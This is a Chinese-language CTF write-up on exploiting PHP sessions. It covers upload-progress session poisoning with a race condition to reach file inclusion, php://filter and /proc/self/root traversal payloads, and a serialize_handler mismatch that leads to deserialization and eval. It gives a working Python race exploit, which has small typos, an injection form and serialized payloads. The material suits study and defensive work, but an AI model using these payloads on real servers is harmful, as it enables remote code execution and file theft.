session.upload_progress.enabled = on //enabled=on表示upload_progress功能开始,也意味着当浏览器向做事器上传一个文件时,php将会把这次文件上传的详细信息(如上传韶光、上传进度等)存储在session当中 ;session.upload_progress.prefix = "upload_progress_" //将表示为session中的键名session.upload_progress.name = "PHP_SESSION_UPLOAD_PROGRESS" //当它涌如今表单中,php将会报告上传进度,而且它的值可控!
!
!
session.use_strict_mode = off //这个选项默认值为off,表示我们对Cookie中sessionid可控!
!
!
session.save_path = /var/lib/php/sessions //session的存贮位置,默认还有一个 /tmp/目录
当session干系配置如上的时候,我们可以利用session.upload_progress将恶意语句写入session文件,从而包含session文件。
平常,当我们要创建session时每每会在php代码里写session_start(),但我们不写的话,也是可以创建的。
比如,在php.ini中设置session.auto_start=On 的情形下,php在吸收要求的时候会自动初始化session,不须要实行session_start()。但默认状态下,这个选项是默认关闭的。
不过幸好,session还有一个默认选项,session.use_strict_mode默认值为0。
这样用户是可以自己定义session ID的。比如,我们在cookie里设置PHPSESSID=AndyNoel,就会在做事器/tmp目录下或者/var/lib/php/sessions/目录下创建一个文件:sess_AndyNoel。即便没有设置自动初始化session,php也会产生session,并天生一个键值,这个键值由ini.get("session.upload_progress.prefix")+我们布局的session.upload_progress.name值组成,末了被一起写入sess_文件里。
[WMCTF 2020]Make PHP Great Again<?phphighlight_file(__FILE__);require_once 'flag.php';if(isset($_GET['file'])) { require_once $_GET['file'];}//Please hack me with your 0day!
很随意马虎创造存在一个文件包含漏洞,但找不到能包含的恶意文件,那我们就可以往session里面写入恶意内容,然后包含它。
【一>所有资源关注我,私信回答“资料”获取<一】1、200份很多已经买不到的绝版电子书2、30G安全大厂内部的视频资料3、100份src文档4、常见安全口试题5、ctf大赛经典题目解析6、全套工具包7、应急相应条记8、网络安全学习路线
session坚持按照上面说的思路创建好session后,问题又来了,那便是在php.ini每每还有一条设置
session.upload_progress.cleanup = on //表示当文件上传结束后,php将会立即清空对应session文件中的内容
默认配置session.upload_progress.cleanup = on导致文件上传后,session文件内容立即清空,清空了就没办法利用了。我们要想办法把session留在里面,以是就要利用条件竞争,在session文件内容清空提高行文件包含利用。
方法一 | 借助Burp Suite可以在本地写一个上传页面,然后抓包添加Cookie: PHPSESSID=AndyNoel,再用BurpSuite爆破
<!DOCTYPE html><html><body><form action="http://localhost/index.php" method="POST" enctype="multipart/form-data"> <input type="hidden" name="PHP_SESSION_UPLOAD_PROGRESS" value="<?php system('cat flag.php');?>" /> <input type="file" name="file" /> <input type="submit" value="submit" /></form></body></html>
一边不断发包要求包含恶意的session,一边不断发包以坚持恶意session存储。这样就可以利用条件竞争把恶意内容留在session里面了。
方法二 | python脚本事理和上面的差不多,但是我们直接编写脚本,写shell、取flag一把梭出来,用不着那么麻烦了
import ioimport sysimport requestsimport threadingsessid = 'AndyNoel'def WRITE(session): while True: f = io.BytesIO(b'a' 1024 50) session.post( 'http://localhost/index.php', data={"PHP_SESSION_UPLOAD_PROGRESS":"<?php system('cat flag.php');?>"}, files={"file":('1.txt', f)}, cookies={'PHPSESSID':sessid} )def READ(session): while True: resp = session.get(f'http://localhost/index.php/?file=../../../../../../../../tmp/sess_{sessid}') if 'flag{' in resp.text: print(resp.text) sys.exit(0) else: print('Thinking[+++++++]')with requests.session() as session: t1 = threading.Thread(target=POST, args=(session, )) t1.daemon = True t1.start() READ(session)
方法三(非预期) | 伪协议合营多级符号链接的办法进行绕过。
在这里有个小知识点,/proc/self指向当提高程的/proc/pid/,/proc/self/root/是指向/的符号链接,想到这里,用伪协议合营多级符号链接的办法进行绕过。
payload:?file=php://filter/convert.base64-encode/resource=/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/var/www/html/flag.php
其余一个payload
?file=php://filter/convert.base64-encode/resource=/nice/../../proc/self/cwd/flag.php
选择不同的处理器,处理办法也不一样,如果序列化和储存session与反序列化的办法不同,就有可能导致漏洞的产生。
Jarvis OJ WEB PHPINFO<?phpini_set('session.serialize_handler', 'php');session_start();class OowoO{ public $mdzz; function __construct() { $this->mdzz = 'phpinfo();'; } function __destruct() { eval($this->mdzz); }}if(isset($_GET['phpinfo'])){ $m = new OowoO();}else{ highlight_string(file_get_contents('index.php'));}?>
如果只看php代码,实在我们是找不到参数可控的地方的,以是通过什么方法来进行反序列化呢?session.serialize_handler
session.serialize_handler (string) 用来定义序列化/反序列化的处理器名字。 当前支持 PHP 序列化格式 (名为 php_serialize)、 PHP PHP 内部格式 (名为 php 及 php_binary) 和 WDDX (名为 wddx)。 如果 PHP 编译时加入了 WDDX 支持,则只能用 WDDX。 php_serialize 在内部大略地直策应用serialize/unserialize函数,并且不会有 php 和 php_binary 所具有的限定。 利用较旧的序列化处理器导致 $_SESSION 的索引既不能是数字也不能包含分外字符(| and !) 。
可以看一下这个题目环境的phpinfo,在session部分
默认session.serialize_handler为php_serialize,而这里却设置为php:
这样就很明显了,由于处理器对应的处理格式不同导致涌现session反序列化漏洞
但还是不足,由于我们还是没办法掌握变量,翻看PHP手册有个故意思的地方:
既然如此,我们可以去看看有关session的php.ini的设置
session.upload_progress.enabled = onsession.upload_progress.name = PHP_SESSION_UPLOAD_PROGRESS设置是这样的话,我们就可以布局反序列化了。
<?phpclass OowoO{ public $mdzz='var_dump(scandir("/opt/lampp/htdocs/"));';//从phpinfo瞥见的}$obj = new OowoO();echo serialize($obj);?>
O:5:"OowoO":1:{s:4:"mdzz";s:40:"var_dump(scandir("/opt/lampp/htdocs/"));";}
为了防止双引号转义,以是要处理一下,在双引号前面加\,以是该当是这样
O:5:\"OowoO\":1:{s:4:\"mdzz\";s:40:\"var_dump(scandir(\"/opt/lampp/htdocs/\"));\";}
然后自己本地写一个提交页面:
<form action="http://localhost/index.php" method="POST" enctype="multipart/form-data"> <input type="hidden" name="PHP_SESSION_UPLOAD_PROGRESS" value="ADNL" /> <input type="file" name="file" /> <input type="submit" /></form>
抓包修正,在序列化的字符串前加 |,提交即可。
小结session有关的安全性问题紧张是文件包含和反序列化两个利用点,利用PHP_SESSION_UPLOAD_PROGRESS可以绕过大部分过滤。